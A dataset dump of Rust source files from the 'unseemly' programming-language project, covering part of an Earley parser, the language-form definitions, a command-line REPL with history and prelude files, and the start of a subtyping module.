*self.local_parse.borrow() ) // no "better" parse? && (other.wanted_by.borrow().len() == 0 // no more wanted? || (other.wanted_by.borrow().iter().all( |w| self.wanted_by.borrow().iter().any(|s_w| w == s_w)))) } fn merge(&self, other: &Item) { if *other.done.borrow() { *self.done.borrow_mut() = true; } use std::cmp::Ordering::*; let comparison = other.local_parse.borrow().partial_cmp(&*self.local_parse.borrow()); log!( "\n(For {}) Merging {:?} and {:?}... ", self.id.0, *other.local_parse.borrow(), *self.local_parse.borrow() ); match comparison { Some(Greater) => { *self.local_parse.borrow_mut() = other.local_parse.borrow().clone(); } Some(Equal) | Some(Less) => { /* no new information */ } None => { // TODO: maybe it would be nice to ignore ambiguities that "don't matter". // But even if `local_parse` is different, the resulting `Ast` can be the same. // So, maybe have `Ambiguous` store all possible ambiguities let amb = LocalParse::Ambiguous( Box::new(self.local_parse.borrow().clone()), Box::new(other.local_parse.borrow().clone()), ); *self.local_parse.borrow_mut() = amb; } } log!("... into {:#?}\n", *self.local_parse.borrow()); for other_wanted in other.wanted_by.borrow().iter() { let mut has = false; for self_wanted in self.wanted_by.borrow().iter() { if self_wanted == other_wanted { has = true; break; } } if !has { self.wanted_by.borrow_mut().push(*other_wanted) } } } // ----------------------------------------------------------- // These methods all make a (singleton) set of items after progressing `self` somehow // TODO: I have a lot of "like <one of these>, but" comments around this file... // fn finish_with(&self, lp: LocalParse, toks_consumed: usize) -> Vec<(Item, usize)> { log!("[fin_w/ ({})]", self.id.0); vec![( Item { done: RefCell::new(true), local_parse: RefCell::new(lp), pos: self.pos + 1, ..self.clone() }, toks_consumed, )] } fn start(&self, rule: &Rc<FormPat>, cur_idx: usize) -> Vec<(Item, usize)> { log!("[start ({})]", self.id.0); vec![( Item { start_idx: cur_idx, rule: rule.clone(), pos: 0, done: RefCell::new(false), pc: self.pc.clone(), common: self.common, file_id: self.file_id, local_parse: RefCell::new(LocalParse::NothingYet), id: get_next_id(), wanted_by: Rc::new(RefCell::new(vec![self.id.get_ref()])), }, 0, )] } // ----------------------------------------------------------- /// See what new items this item justifies fn examine(&self, toks: &str, cur_idx: usize, chart: &[Vec<Item>]) -> Vec<(Item, usize)> { let mut res = if *self.done.borrow() { let mut waiting_satisfied = vec![]; log!("({:#?}) done; {} items want it\n", self, (*self.wanted_by.borrow()).len()); for &waiting_item_id in self.wanted_by.borrow().iter() { if let Some(waiting_item) = chart[self.start_idx].iter().find(|i| i.id.is(waiting_item_id)) { // It's `None` if it's the startier item let me_justif = JustifiedByItem(self.id.get_ref()); // We `finish_with` here for things that are waiting on other items, // in `shift_or_predict` for leaves. // Except for `Seq`. TODO: why? let mut more = match *waiting_item.rule { Anyways(_) | Impossible | Scan(_, _) => { icp!("{:#?} should not be waiting for anything!", waiting_item) } Seq(ref subs) => { if (waiting_item.pos) as usize == subs.len() { vec![] } else { // Like `waiting_item.advance`, but with a local_parse vec![( Item { pos: waiting_item.pos + 1, local_parse: RefCell::new(me_justif), ..waiting_item.clone() }, 0, )] } } Plus(_) | Star(_) => { // It'll also keep going, though! waiting_item.finish_with(me_justif, 0) } SynImport(_, _, _) if waiting_item.pos == 0 => vec![( Item { pos: 1, local_parse: RefCell::new(me_justif), ..waiting_item.clone() }, 0, )], VarRef(_) | Alt(_) | Call(_) | Scope(_, _) | Pick(_, _) | Named(_, _) | SynImport(_, _, _) | NameImport(_, _) | NameImportPhaseless(_, _) | QuoteDeepen(_, _) | QuoteEscape(_, _) | Common(_) => waiting_item.finish_with(me_justif, 0), // Using `c_parse` instead of `local_parse` here is weird, // but probably necessary to allow `Call` under `Reserved`. Reserved(_, ref name_list) => match self.c_parse(chart, cur_idx) { Ok(ast_with_name) => match ast_with_name.c() { ast::Atom(name) | ast::VariableReference(name) => { if name_list.contains(&name) { vec![] } else { waiting_item.finish_with(me_justif, 0) } } _ => { log!("found something unusual {:?}", ast_with_name); vec![] } }, Err(_) => { log!("passing an error through `Reserved`"); waiting_item.finish_with(me_justif, 0) } }, Literal(_, expected) => match self.c_parse(chart, cur_idx) { Ok(ast) => { if ast.c() == &ast::Atom(expected) { waiting_item.finish_with(me_justif, 0) } else { vec![] } } _other => { log!("passing an error through `Literal`"); waiting_item.finish_with(me_justif, 0) } }, Biased(ref _plan_a, ref plan_b) => { if &*self.rule as *const FormPat == &**plan_b as *const FormPat { waiting_item.finish_with(JustifiedByItemPlanB(self.id.get_ref()), 0) } else { waiting_item.finish_with(me_justif, 0) } } }; waiting_satisfied.append(&mut more); } } waiting_satisfied } else { vec![] }; if !res.is_empty() { if let Call(_) = *res[0].0.rule { // HACK: I think that `Call` is uninformative } else if !self.common { // Possibly set the high-water mark for parse error purposes: best_token.with(|bt| { if cur_idx > bt.borrow().0 { // We've parsed further than ever before *bt.borrow_mut() = (cur_idx, res[0].0.rule.clone(), res[0].0.pos) } else if cur_idx == bt.borrow().0 && res[0].0.pos > bt.borrow().2 { // We're deeper into a rule than ever before *bt.borrow_mut() = (cur_idx, res[0].0.rule.clone(), res[0].0.pos) } }); } } res.append(&mut self.shift_or_predict(toks, cur_idx, chart)); res } fn shift_or_predict( &self, toks: &str, cur_idx: usize, chart: &[Vec<Item>], ) -> Vec<(Item, usize)> { // Try to shift (bump `pos`, or set `done`) or predict (`start` a new item) match (self.pos, &*(self.rule.clone())) { // TODO: is there a better way to match in `Rc`? (0, &Anyways(ref a)) => self.finish_with(ParsedAtom(a.clone()), 0), (_, &Impossible) => vec![], (0, &Literal(ref sub, _)) => self.start(sub, cur_idx), (0, &Scan(crate::grammar::Scanner(ref regex), _)) => { let mut caps = regex.capture_locations(); if regex.captures_read(&mut caps, &toks[cur_idx..]).is_some() { match caps.get(1) { Some((start, end)) => { // These are byte indices! self.finish_with( ParsedAtom(Ast(Rc::new(LocatedAst { c: ast::Atom(n(&toks[cur_idx + start..cur_idx + end])), file_id: self.file_id, begin: cur_idx + start, end: cur_idx + end, }))), caps.get(0).unwrap().1, // End of the *whole string consumed* ) } None => self.finish_with(NothingYet, caps.get(0).unwrap().1), } } else { vec![] } } (0, &VarRef(ref sub)) => self.start(sub, cur_idx), (pos, &Seq(ref subs)) => { if pos < subs.len() { self.start(&subs[pos as usize], cur_idx) } else if pos == subs.len() { // a little like `.finish`, but without advancing vec![(Item { done: RefCell::new(true), ..self.clone() }, 0)] } else { vec![] } } (_, &Star(ref sub)) => { // Special case: the elegant thing would be to create `Star` pre-`done` let mut res = if self.pos == 0 { // Like `.finish`, but without advancing vec![(Item { done: RefCell::new(true), ..self.clone() }, 0)] } else { vec![] }; res.append(&mut self.start(&sub, cur_idx)); // But we can take more! res } (_, &Plus(ref sub)) => self.start(&sub, cur_idx), (0, &Alt(ref subs)) => { let mut res = vec![]; for sub in subs { res.append(&mut self.start(&(*sub), cur_idx)); } res } // Needs special handling elsewhere! (0, &Biased(ref plan_a, ref plan_b)) => { let mut res = self.start(&plan_a, cur_idx); res.append(&mut self.start(&plan_b, cur_idx)); res } (0, &Call(n)) => self.start(&self.pc.grammar.find_or_panic(&n), cur_idx), (0, &Scope(ref f, _)) => { // form.grammar is a FormPat. Confusing! self.start(&f.grammar, cur_idx) } (0, &Pick(ref body, _)) => self.start(&body, cur_idx), (0, &SynImport(ref lhs, _, _)) => self.start(&lhs, cur_idx), (1, &SynImport(_, ref body, ref f)) => { // TODO: handle errors properly! Probably need to memoize, also! // TODO: an ambiguity or error here leads to a pretty confusing parse failure. // It ought to be an outright parse error, // even if it theoretically could get papered over, // but we don't have a way to communicate those here. let partial_parse = match *self.local_parse.borrow() { NothingYet => return vec![], Ambiguous(_, _) => { println!( "Warning: ambiguity in syntax import! {:?}", *self.local_parse.borrow() ); return vec![]; } ParsedAtom(ref a) => a.clone(), JustifiedByItem(_) | JustifiedByItemPlanB(_) => { match self .find_wanted(chart, cur_idx) .map(|item| item.c_parse(chart, cur_idx)) { Ok(Ok(ast)) => ast, e => { println!("Warning: error in syntax import! {:?}", e); return vec![]; } } } }; // We can't use `.or_insert_with()` here, // since "import" can encounter grammars with extensions while extending! let existing_pc = all_parse_contexts .with(|grammars| grammars.borrow().get(&self.id.get_ref()).cloned()); let new_ctxt = match existing_pc { Some(pc) => pc, None => { let new_ctxt = f.0((*self.pc).clone(), partial_parse); all_parse_contexts.with(|grammars| { grammars.borrow_mut().insert(self.id.get_ref(), new_ctxt.clone()) }); new_ctxt } }; vec![( Item { start_idx: cur_idx, rule: body.clone(), pos: 0, done: RefCell::new(false), pc: Rc::new(new_ctxt), common: false, file_id: self.file_id, local_parse: RefCell::new(LocalParse::NothingYet), id: get_next_id(), wanted_by: Rc::new(RefCell::new(vec![self.id.get_ref()])), }, 0, )] } (0, &Named(_, ref body)) | (0, &NameImport(ref body, _)) | (0, &NameImportPhaseless(ref body, _)) | (0, &QuoteDeepen(ref body, _)) | (0, &QuoteEscape(ref body, _)) | (0, &Reserved(ref body, _)) => self.start(&body, cur_idx), (0, &Common(ref body)) => { let mut res = self.start(&body, cur_idx); res[0].0.common = true; // Only has one element res } // Rust rightly complains that this is unreachable; yay! // But how do I avoid a catch-all pattern for the pos > 0 case? //(0, _) => { icp!("unhandled FormPat") }, _ => vec![], // end of a rule } } fn find_wanted<'f, 'c>( &'f self, chart: &'c [Vec<Item>], done_tok: usize, ) -> Result<&'c Item, ParseError> { let mut first_found: Option<&Item> = None; let local_parse = self.local_parse.borrow().clone(); let desired_id = match local_parse { JustifiedByItem(id) | JustifiedByItemPlanB(id) => id, Ambiguous(ref l, ref r) => { // HACK: this is quite ugly! let l = *l.clone(); let r = *r.clone(); log!("===Ambiguity===\n"); // Show both parses... *self.local_parse.borrow_mut() = l; let l_res = self.c_parse(chart, done_tok).unwrap(); *self.local_parse.borrow_mut() = r; let r_res = self.c_parse(chart, done_tok).unwrap(); return Err(ParseError { msg: format!("Ambiguity! \n=L=>{}\n=R=>{}\n", l_res, r_res), }); } _ => icp!("tried to parse unjustified item: {:#?} ", self), }; log!("We are {:#?} at {}...\n", self, done_tok); for idx in 0..chart[done_tok].len() { let i = &chart[done_tok][idx]; if i.id.is(desired_id) { match first_found { None => { first_found = Some(i); } Some(_) => icp!("unacknowledged ambiguity!"), } } } Ok(first_found.expect("ICP: no parse after successful recognition")) } /// Put location information on an `AstContents`, forming an `Ast`. fn locate(&self, done_tok: usize, c: ast::AstContents) -> Ast { Ast(Rc::new(ast::LocatedAst { c: c, file_id: self.file_id, begin: self.start_idx, end: done_tok, })) } /// After the chart is built, we parse... fn c_parse(&self, chart: &[Vec<Item>], done_tok: usize) -> ParseResult { log!("Tring to parse {:#?}...\n", self); // assert!(*self.done.borrow()); // false during ambiguity reporting let res = match *self.rule { Anyways(ref a) => Ok(a.clone()), Impossible => icp!("Parser parsed the impossible!"), Scan(_, _) => match self.local_parse.borrow().clone() { ParsedAtom(a) => Ok(a), NothingYet => Ok(ast!((trivial))), // TODO: should we fake location info here? _ => icp!(), }, VarRef(_) => { let var_ast = self.find_wanted(chart, done_tok)?.c_parse(chart, done_tok)?; match var_ast.c() { ast::Atom(a) => Ok(var_ast.with_c(ast::VariableReference(*a))), _ => icp!("no atom saved"), } } Literal(_, _) | Alt(_) | Biased(_, _) | Call(_) | Reserved(_, _) | Common(_) => { self.find_wanted(chart, done_tok)?.c_parse(chart, done_tok) } Seq(_) | Star(_) | Plus(_) | SynImport(_, _, _) => { let mut step = self; let mut subtrees: Vec<Ast> = vec![];
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/form.rs
src/form.rs
#![macro_use] use crate::{ ast_walk::WalkRule, grammar::FormPat, name::*, util::assoc::Assoc, walk_mode::WalkMode, }; use std::{ fmt::{Debug, Error, Formatter}, rc::Rc, }; pub type NMap<T> = Assoc<Name, T>; /// "BiDirectionalWalkRule": a walk rule, abstracted over whether the walk is positive or negative pub type BiDiWR<Mode, NegMode> = EitherPN<WalkRule<Mode>, WalkRule<NegMode>>; custom_derive! { /// Unseemly language form. This is what tells us what a particular `Node` actually does. #[derive(Reifiable)] pub struct Form { /// The name of the form. Mainly for internal use. pub name: Name, /// The grammar the programmer should use to invoke this form. /// This contains information about bindings and syntax extension: pub grammar: Rc<FormPat>, /// (Meaningful for types only) Subtype. pub type_compare: BiDiWR<crate::ty_compare::Canonicalize, crate::ty_compare::Subtype>, /// From a type environment, construct the type of this term. pub synth_type: BiDiWR<crate::ty::SynthTy, crate::ty::UnpackTy>, /// (Meaningful for exprs and pats only) From a value environment, evaluate this term. /// Or, (HACK) macro expansion, for macro invocations (just so we don't need another field) pub eval: BiDiWR<crate::runtime::eval::Eval, crate::runtime::eval::Destructure>, /// At runtime, pick up code to use it as a value pub quasiquote: BiDiWR<crate::runtime::eval::QQuote, crate::runtime::eval::QQuoteDestr>, } } custom_derive! { /// The distinction between `Form`s with positive and negative walks is documented at `Mode`. #[derive(Reifiable)] pub enum EitherPN<L, R> { Positive(L), Negative(R), Both(L, R) // Maybe instead of WalkRule::NotWalked, we need EitherPN::Neither } } pub use self::EitherPN::*; impl<Mode: WalkMode> EitherPN<WalkRule<Mode>, WalkRule<Mode::Negated>> { pub fn pos(&self) -> &WalkRule<Mode> { match *self { Positive(ref l) | Both(ref l, _) => l, Negative(_) => &WalkRule::NotWalked, } } pub fn neg(&self) -> &WalkRule<Mode::Negated> { match *self { Negative(ref r) | Both(_, ref r) => r, Positive(_) => &WalkRule::NotWalked, } } pub fn is_pos(&self) -> bool { match *self { Negative(_) => false, _ => true, } } pub fn is_neg(&self) -> bool { match *self { Positive(_) => false, _ => true, } } } impl PartialEq for Form { /// pointer equality on the underlying structure! fn eq(&self, other: &Form) -> bool { self as *const Form == other as *const Form } } impl Debug for Form { fn fmt(&self, formatter: &mut Formatter) -> Result<(), Error> { formatter.write_str(format!("[FORM {:#?}]", self.name).as_str()) } } pub fn simple_form(form_name: &str, p: FormPat) -> Rc<Form> { use WalkRule::*; Rc::new(Form { name: n(form_name), grammar: Rc::new(p), type_compare: Both(NotWalked, NotWalked), synth_type: Positive(NotWalked), eval: Positive(NotWalked), quasiquote: Both(LiteralLike, LiteralLike), }) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/cli.rs
src/cli.rs
#![allow(non_snake_case)] use std::{fs::File, io::Read, path::Path}; use libunseemly::{ ast, ast::Ast, core_forms, expand, grammar, name::{n, Name}, runtime::{core_values, eval, eval::Value}, ty, ty_compare, util::assoc::Assoc, }; use std::{borrow::Cow, cell::RefCell, io::BufRead}; thread_local! { pub static TY_ENV : RefCell<Assoc<Name, Ast>> = RefCell::new(core_values::core_types()); pub static VAL_ENV : RefCell<Assoc<Name, Value>> = RefCell::new(core_values::core_values()); } #[cfg_attr(tarpaulin, skip)] fn main() { let arguments: Vec<String> = std::env::args().collect(); if arguments.len() == 1 { repl(); } else if arguments.len() == 2 { let filename = Path::new(&arguments[1]); let mut raw_input = String::new(); File::open(&filename) .expect("Error opening file") .read_to_string(&mut raw_input) .expect("Error reading file"); // So the file can import (etc.) relative to its own location: if let Some(dir) = filename.parent() { if dir.is_dir() { std::env::set_current_dir(dir).unwrap(); } } libunseemly::terminal_display(libunseemly::eval_unseemly_program_top(&raw_input)); } else if arguments.len() == 3 { let lang = libunseemly::language_from_file(&std::path::Path::new(&arguments[1])); // Run the second program in the language defined by the first: let mut second_program = String::new(); File::open(&Path::new(&arguments[2])) .expect("Error opening file") .read_to_string(&mut second_program) .expect("Error reading file"); if let Some(dir) = Path::new(&arguments[2]).parent() { if dir.is_dir() { std::env::set_current_dir(dir).unwrap(); } } libunseemly::terminal_display(libunseemly::eval_program(&second_program, lang)); } } struct LineHelper { highlighter: rustyline::highlight::MatchingBracketHighlighter, // Braket-matching isn't exactly right, // but running the whole parser to decide whether more lines are needed is probably ... bad. validator: rustyline::validate::MatchingBracketValidator, } impl LineHelper { fn new() -> LineHelper { LineHelper { highlighter: rustyline::highlight::MatchingBracketHighlighter::new(), validator: rustyline::validate::MatchingBracketValidator::new(), } } } impl rustyline::completion::Completer for LineHelper { type Candidate = String; fn complete( &self, line: &str, pos: usize, _ctxt: &rustyline::Context, ) -> Result<(usize, Vec<String>), rustyline::error::ReadlineError> { let mut res = vec![]; let (start, word_so_far) = rustyline::completion::extract_word(line, pos, None, b"[({ })]"); VAL_ENV.with(|vals| { let vals = vals.borrow(); for k in vals.iter_keys() { if k.sp().starts_with(word_so_far) { res.push(k.sp()); } } }); Ok((start, res)) } } impl rustyline::hint::Hinter for LineHelper { type Hint = String; fn hint(&self, _line: &str, _pos: usize, _ctxt: &rustyline::Context) -> Option<String> { None } } impl rustyline::highlight::Highlighter for LineHelper { fn highlight<'l>(&self, line: &'l str, pos: usize) -> Cow<'l, str> { self.highlighter.highlight(line, pos) } fn highlight_prompt<'b, 's: 'b, 'p: 'b>( &'s self, prompt: &'p str, default: bool, ) -> Cow<'b, str> { self.highlighter.highlight_prompt(prompt, default) } fn highlight_hint<'h>(&self, hint: &'h str) -> Cow<'h, str> { self.highlighter.highlight_hint(hint) } fn highlight_candidate<'c>( &self, candidate: &'c str, completion: rustyline::config::CompletionType, ) -> Cow<'c, str> { self.highlighter.highlight_candidate(candidate, completion) } fn highlight_char(&self, line: &str, pos: usize) -> bool { self.highlighter.highlight_char(line, pos) } } impl rustyline::validate::Validator for LineHelper { fn validate( &self, ctx: &mut rustyline::validate::ValidationContext, ) -> rustyline::Result<rustyline::validate::ValidationResult> { self.validator.validate(ctx) } fn validate_while_typing(&self) -> bool { self.validator.validate_while_typing() } } impl rustyline::Helper for LineHelper {} pub fn repl() { let prelude_filename = dirs::home_dir().unwrap().join(".unseemly_prelude"); let history_filename = dirs::home_dir().unwrap().join(".unseemly_history"); let mut rl = rustyline::Editor::<LineHelper>::new(); rl.set_helper(Some(LineHelper::new())); let quit = regex::Regex::new(r"\s*quit\s*").unwrap(); let just_parse = regex::Regex::new(r"^:p (.*)$").unwrap(); let just_parse_debug_print = regex::Regex::new(r"^:pd (.*)$").unwrap(); let just_type = regex::Regex::new(r"^:t (.*)$").unwrap(); let just_eval = regex::Regex::new(r"^:e (.*)$").unwrap(); let type_and_expand = regex::Regex::new(r"^:x (.*)$").unwrap(); let canon_type = regex::Regex::new(r"^:tt (.*)$").unwrap(); let subtype = regex::Regex::new(r"^:sub (.*)\s*<:\s*(.*)$").unwrap(); let assign_value = regex::Regex::new(r"^(\w+)\s*:=(.*)$").unwrap(); let save_value = regex::Regex::new(r"^:s +((\w+)\s*:=(.*))$").unwrap(); let assign_type = regex::Regex::new(r"^(\w+)\s*t=(.*)$").unwrap(); let save_type = regex::Regex::new(r"^:s +((\w+)\s*t=(.*))$").unwrap(); let comment = regex::Regex::new(r"^#").unwrap(); println!(); println!(" \x1b[1;38mUnseemly\x1b[0m"); println!(" `<expr>` to (typecheck and expand and) evaluate `<expr>`."); println!(" `:x <expr>` to (typecheck and) expand `<expr>`."); println!(" `:e <expr>` to (expand and) evaluate `<expr>` without typechecking."); println!(" `<name> := <expr>` to bind a name for this session."); println!(" `:t <expr>` to synthesize the type of <expr>."); println!(" `:tt <type>` to canonicalize <type>."); println!(" `:sub <type_a> <: <type_b>` to check that `<type_a>` is a subtype of `<type_b>`"); println!(" `<name> t= <type>` to bind a type for this session."); println!(" `:s <name> := <expr>` to save a binding to the prelude for the future."); println!(" `:s <name> t= <expr>` to save a type binding to the prelude."); println!(" `:p <expr>` to parse `<expr>` and pretty-print its AST output."); println!(" `:pd <expr>` to parse `<expr>` and debug-print its AST output."); println!(" Command history is saved over sessions."); println!(" Tab-completion works on variables, and lots of Bash-isms work."); if let Ok(prelude_file) = File::open(&prelude_filename) { let prelude = std::io::BufReader::new(prelude_file); for line in prelude.lines() { let line = line.unwrap(); if comment.captures(&line).is_some() { // comment } else if let Some(caps) = assign_value.captures(&line) { if let Err(e) = assign_variable(&caps[1], &caps[2]) { println!(" Error in prelude line: {}\n {}", line, e); } } else if let Some(caps) = assign_type.captures(&line) { if let Err(e) = assign_t_var(&caps[1], &caps[2]) { println!(" Error in prelude line: {}\n {}", line, e); } } } println!(" [prelude loaded from {}]", prelude_filename.display()); } println!(); println!("This virtual machine kills cyber-fascists."); let _ = rl.load_history(&history_filename); while let Ok(line) = rl.readline("\x1b[1;36m≫\x1b[0m ") { // TODO: count delimiters, and allow line continuation! rl.add_history_entry(line.clone()); if quit.captures(&line).is_some() { break; } let result = if let Some(caps) = just_parse.captures(&line) { parse_unseemly_program(&caps[1], true) } else if let Some(caps) = just_parse_debug_print.captures(&line) { parse_unseemly_program(&caps[1], false) } else if let Some(caps) = just_type.captures(&line) { type_unseemly_program(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = just_eval.captures(&line) { eval_unseemly_program_without_typechecking(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = type_and_expand.captures(&line) { type_and_expand_unseemly_program(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = canon_type.captures(&line) { canonicalize_type(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = subtype.captures(&line) { check_subtype(&caps[1], &caps[2]).map(|x| format!("{}", x)) } else if let Some(caps) = assign_value.captures(&line) { assign_variable(&caps[1], &caps[2]).map(|x| format!("{}", x)) } else if let Some(caps) = save_value.captures(&line) { match assign_variable(&caps[2], &caps[3]) { Ok(_) => { use std::io::Write; let mut prel_file = std::fs::OpenOptions::new() .create(true) .append(true) .open(&prelude_filename) .unwrap(); writeln!(prel_file, "{}", &caps[1]).unwrap(); Ok(format!("[saved to {}]", &prelude_filename.display())) } Err(e) => Err(e), } } else if let Some(caps) = assign_type.captures(&line) { assign_t_var(&caps[1], &caps[2]).map(|x| format!("{}", x)) } else if let Some(caps) = save_type.captures(&line) { match assign_t_var(&caps[2], &caps[3]) { Ok(_) => { use std::io::Write; let mut prel_file = std::fs::OpenOptions::new() .create(true) .append(true) .open(&prelude_filename) .unwrap(); writeln!(prel_file, "{}", &caps[1]).unwrap(); Ok(format!("[saved to {}]", &prelude_filename.display())) } Err(e) => Err(e), } } else { eval_unseemly_program(&line).map(|x| format!("{}", x)) }; match result { Ok(v) => println!("\x1b[1;32m≉\x1b[0m {}", v), Err(s) => println!("\x1b[1;31m✘\x1b[0m {}", s), } } println!("Bye! Saving history to {}", &history_filename.display()); rl.save_history(&history_filename).unwrap(); } fn assign_variable(name: &str, expr: &str) -> Result<Value, String> { let res = eval_unseemly_program(expr); if let Ok(ref v) = res { let ty = type_unseemly_program(expr).unwrap(); TY_ENV.with(|tys| { VAL_ENV.with(|vals| { let new_tys = tys.borrow().set(n(name), ty); let new_vals = vals.borrow().set(n(name), v.clone()); *tys.borrow_mut() = new_tys; *vals.borrow_mut() = new_vals; }) }) } res } fn assign_t_var(name: &str, t: &str) -> Result<Ast, String> { let ast = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t, ) .map_err(|e| e.msg)?; let res = TY_ENV.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))); if let Ok(ref t) = res { TY_ENV.with(|tys| { let new_tys = tys.borrow().set(n(name), t.clone()); *tys.borrow_mut() = new_tys; }) } res } fn canonicalize_type(t: &str) -> Result<Ast, String> { let ast = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t, ) .map_err(|e| e.msg)?; TY_ENV.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))) } fn check_subtype(t_a: &str, t_b: &str) -> Result<Ast, String> { let ast_a = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t_a, ) .map_err(|e| e.msg)?; let ast_b = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t_b, ) .map_err(|e| e.msg)?; TY_ENV.with(|tys| { ty_compare::must_subtype(&ast_a, &ast_b, tys.borrow().clone()) .map( // TODO: just figure out how to import `ast!` instead: |env| { ast::Ast(std::rc::Rc::new(ast::LocatedAst { c: ast::Atom(n(&format!("OK, under this environment: {}", env))), begin: 0, end: 0, file_id: 0, })) }, ) .map_err(|e| format!("{}", e)) }) } fn parse_unseemly_program(program: &str, pretty: bool) -> Result<String, String> { let ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; if pretty { Ok(format!("{}", ast)) } else { Ok(format!("{:#?}", ast)) } } fn type_unseemly_program(program: &str) -> Result<Ast, String> { let ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; TY_ENV.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))) } fn eval_unseemly_program_without_typechecking(program: &str) -> Result<Value, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let core_ast = expand::expand(&ast).map_err(|_| "error".to_owned())?; VAL_ENV.with(|vals| eval::eval(&core_ast, vals.borrow().clone()).map_err(|_| "???".to_string())) } fn eval_unseemly_program(program: &str) -> Result<Value, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let _type = TY_ENV .with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e)))?; let core_ast = expand::expand(&ast).map_err(|_| "error".to_owned())?; VAL_ENV.with(|vals| eval::eval(&core_ast, vals.borrow().clone()).map_err(|_| "???".to_string())) } fn type_and_expand_unseemly_program(program: &str) -> Result<ast::Ast, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let _type = TY_ENV .with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e)))?; expand::expand(&ast).map_err(|_| "error".to_owned()) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/subtype.rs
src/subtype.rs
use crate::{ ast::{ Ast, AstContents::{Atom, Node, Shape, VariableReference}, }, ast_walk::{walk, LazyWalkReses, WalkRule}, form::Form, name::{n, Name}, ty::TypeError, util::assoc::Assoc, walk_mode::{NegativeWalkMode, WalkMode}, }; custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct Subtype {} } // TODO: gensym and store fn mystery_id() -> Name { n("mystery_for_typechecking") } fn new_mystery(supers: Vec<Ast>, subs: Vec<Ast>) -> Ast { raw_ast!(Shape(vec![ raw_ast!(Atom(mystery_id())), raw_ast!(Shape(supers)), raw_ast!(Shape(subs)) ])) } fn is_mystery(a: &Ast) -> bool { let Shape(shape_parts) = a.c() else { return false; }; return !shape_parts.is_empty() && shape_parts[0].c() == &Atom(mystery_id()); } fn unpack_mystery(mystery: &Ast) -> (Vec<Ast>, Vec<Ast>) { let Shape(mystery_parts) = mystery.c() else { icp!() }; let Shape(subs) = mystery_parts[2].c().clone() else {icp!() }; let Shape(supers) = mystery_parts[1].c().clone() else {icp!() }; (supers, subs) } fn complete_mystery() -> Ast { new_mystery(vec![], vec![]) } fn constrain_mystery(mystery: &Ast, constraint: Ast, super_type: bool) -> Ast { let (mut supers, mut subs) = unpack_mystery(mystery); let constraints = if super_type { &mut supers } else { &mut subs }; if !constraints.contains(&constraint) { constraints.push(constraint); } new_mystery(supers, subs) } // If `ty` is a mystery, return it; otherwise, make it a fully-constrained mystery fn ensure_mystery(ty: Ast) -> Ast { if is_mystery(&ty) { return ty; } new_mystery(vec![ty.clone()], vec![ty]) } fn merge_mysteries(mystery_lhs: &Ast, mystery_rhs: &Ast) -> Ast { let mut lhs = unpack_mystery(mystery_lhs); let rhs = unpack_mystery(mystery_rhs); for constraint in rhs.0 { if !lhs.0.contains(&constraint) { lhs.0.push(constraint); } } for constraint in rhs.1 { if !lhs.1.contains(&constraint) { lhs.1.push(constraint); } } new_mystery(lhs.0, lhs.1) } fn mystery_satisfiable(mystery: &Ast, parts: &LazyWalkReses<Subtype>) -> Result<(), TypeError> { let (supers, subs) = unpack_mystery(mystery); // Pick a maximally-constrained constraint on one side; // does it satisfy all the constraints on the other? // TODO: Does this always find a satisfaction if there is one? for super_constraint in &supers { if !supers .iter() .all(|other_super| must_subtype(super_constraint, other_super, parts).is_ok()) { continue; } // all other super constraints are a supertype to this for sub_constriant in &subs { must_subtype(sub_constriant, super_constraint, parts)? } } Ok(()) } // TODO: we should really have some sort of general mechanism... // `expect_ty_node!` isn't quite right; we just want to panic if it fails fn destr_forall(a: &Ast) -> Option<(Vec<Name>, &Ast)> { if let Node(f, parts, _) = a.c() { if f.name != n("forall_type") { return None; } return Some(( parts.get_rep_leaf_or_panic(n("param")).into_iter().map(Ast::to_name).collect(), parts.get_leaf_or_panic(&n("body")), )); } else { return None; } } fn merge_bindings(lhs: Ast, rhs: Ast) -> Ast { // As an optimization, if the types are spelled the same, we know they're equivalent: if lhs == rhs { return lhs; } merge_mysteries(&ensure_mystery(lhs), &ensure_mystery(rhs)) } impl WalkMode for Subtype { fn name() -> &'static str { "Subtype" } type Elt = Ast; type Negated = UnusedPositiveSubtype; type AsPositive = UnusedPositiveSubtype; type AsNegative = Subtype; type Err = TypeError; type D = crate::walk_mode::Negative<Subtype>; type ExtraInfo = (); fn get_walk_rule(_f: &Form) -> WalkRule<Subtype> { 